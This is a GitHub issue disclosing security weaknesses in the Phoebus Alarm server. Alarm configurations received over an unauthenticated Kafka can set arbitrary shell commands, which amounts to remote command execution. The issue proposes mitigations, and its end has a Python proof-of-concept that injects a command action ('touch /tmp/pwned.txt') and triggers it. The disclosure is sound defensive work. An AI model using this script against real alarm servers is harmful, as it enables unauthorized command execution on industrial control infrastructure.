Skip to content

Security concerns of the Phoebus Alarm system #3702

@minijackson

Description

@minijackson

While investigating Phoebus Alarm to deploy to our infrastructures, I found some things that I considered security-related, and I thought it would be good to bring to your attention.

These security issues are made worse by the fact that alarm servers often sits on the edge of several networks: it's often in both the "IOC network" and on an "outside network" for sending notifications.

  • If the Kafka server is configured without mutual TLS or TLS+Authentication, then the server is trivially vulnerable to Remote Command Execution (RCE).
  • If the Kafka server is configured on every network interface, then that RCE can be run from the outside network.

Running arbitrary commands

Right now, the configuration sent by the operator can set any arbitrary command to run when an alarm is triggered.

From a usability perspective, I'm not sure every operator knows Linux command-line, or the tools installed on the phoebus-alarm server, or even the exact notification policies.

From a security perspective, this is quite bad, the closest Common Weakness Enumeration (CWE) that I could find is CWE-78 (OS Command Injection), but I'm not sure if I'd call it an "Injection" if the whole command is arbitrary.

The CWE-78 page provides some mitigation options:

  • Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.

    • I personally think that's our best option: make a list of available commands on the server side, and only provide this list to the client side.
      This way, operators can't run arbitrary commands and would only choose something that makes sense in the context of the project.
  • Use library calls rather than external processes to recreate the desired functionality

    • That's done for emails, in my opinion it could be done for things like HTTP webhooks, but it's going to be complicated to offer something that will satisfy every use case.
  • Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system.

    • Right now, this is up to the system administrator to do that, and I didn't find any guidance in the Phoebus documentation on sandboxing phoebus-alarm-server.
      The documentation could be improved to suggest using a sandboxed environment (such as containers or systemd service hardening) and a Linux security module (SELinux, AppArmor).
    • CWE-78 also mentions using Java's SecurityManager to sandbox the process

Exposed Kafka

The fact that Kafka has to be exposed to the IOC and Operator network means that anyone on the network (unless Kafka has mTLS and/or authentication) can configure alarms, configure the command to run on alarm, and trigger alarm. If mTLS and/or authentication is used, authenticated operators still have the permission to trigger alarms, which doesn't make sense to me (I haven't found clear guidance on how to have granular Kafka permissions).

From an architecture standpoint, I think it would have been more secure and future-proof to "hide" Kafka from the outside world.

Most installations only need a single Kafka server, which could be just be listening to the local network interface, and communitation from/to the Phoebus client could be done via an HTTP API (and/or websockets, or EPICS CA/PVA, or something else for PubSub).
This way, read/writes can be authenticated and authorized by the phoebus-alarm-server, and from an architecture design point of view, it's simpler to replace Kafka if we want a competing implementation.

I also had to search pretty deep to find the Phoebus documentation that explains how to encrypt Kafka traffic, and how to add authentication to Kafka. It would be good to mention clearly to sysadmins that the Kafka cluster should either be completely isolated/in a trusted environment, or encrypted/authenticated.

Proof of concept

Proof of concept attack script (needs the kafka-python-ng Python module):
import json

from kafka import KafkaProducer


def main():
    producer = KafkaProducer(bootstrap_servers="my-kafka-server:9092")

    print("Configuring alarm")
    config = {
        "user": "root",
        "host": "localhost.localdomain",
        "description": "The Alarm",
        "actions": [
            {
                "title": "pwn",
                "details": "cmd:/usr/bin/env touch /tmp/pwned.txt",
            },
        ],
    }
    producer.send(
        "Accelerator",
        key=b"config:/Accelerator/ALARM_TEST",
        value=json.dumps(config).encode(),
    )

    print("Sending alarm")
    state = {"severity": "MAJOR", "message": "You've been pwned"}
    producer.send(
        "Accelerator",
        key=b"state:/Accelerator/ALARM_TEST",
        value=json.dumps(state).encode(),
    )


if __name__ == "__main__":
    main()

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions